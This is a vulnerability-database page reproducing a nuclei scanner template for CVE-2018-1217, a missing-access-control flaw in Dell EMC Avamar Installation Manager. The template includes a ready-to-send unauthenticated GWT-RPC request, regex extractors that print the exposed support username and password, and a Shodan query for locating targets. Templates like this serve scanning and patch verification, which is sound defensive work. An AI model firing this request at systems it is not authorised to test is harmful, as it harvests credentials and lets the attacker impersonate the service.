Lucene search
K

Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Missing access control lets attackers read or modify LDLS credentials, enabling impersonation.

Related
Refs
Code
id: CVE-2018-1217

info:
  name: Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
  author: daffainfo
  severity: critical
  description: |
    Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to login to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
  impact: |
    Unauthenticated attackers can read or modify Local Download Service credentials, impersonate the service when accessing Dell EMC Online Support, or prevent legitimate connections by corrupting the configuration.
  remediation: |
    Upgrade to a patched version of Dell EMC Avamar or apply vendor-provided security updates.
  reference:
    - https://www.exploit-db.com/exploits/44441
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1217
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1217
    epss-score: 0.46642
    epss-percentile: 0.98672
    cwe-id: CWE-862
    cpe: cpe:2.3:a:dell:emc_avamar:*:*:*:*:*:*:*:*, cpe:2.3:a:dell:emc_integrated_data_protection_appliance:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dell
    product: emc_avamar,emc_integrated_data_protection_appliance
    shodan-query: title:"AVAMAR"
  tags: cve,cve2018,dell,avamar,vkev,vuln

http:
  - raw:
      - |
        POST /avi/avigui/avigwt HTTP/1.1
        Host: {{Hostname}}
        X-Gwt-Permutation: {{randstr}}
        X-Gwt-Module-Base: https://{{Hostname}}/avi/avigui/
        Content-Type: text/x-gwt-rpc; charset=UTF-8

        7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0|

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        name: username
        group: 1
        internal: true
        regex:
          - 'emcsupportUsername\\":\\"(.*?)\\"'

      - type: regex
        name: password
        group: 1
        internal: true
        regex:
          - 'emcsupportPassword\\":\\"(.*?)\\"'

      - type: dsl
        dsl:
          - '"Username: " + username + " Password: " + password'
# digest: 4b0a00483046022100d93edd9f50481822ed9c8e08419bf55c8f6bd0f0d975e9254464b0f1458e76bb022100e9cf85e81cfc21b8e4dbbecd01d03fd9838f34d5865efc039ecfd791591229dc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 39.8
EPSS0.46642
10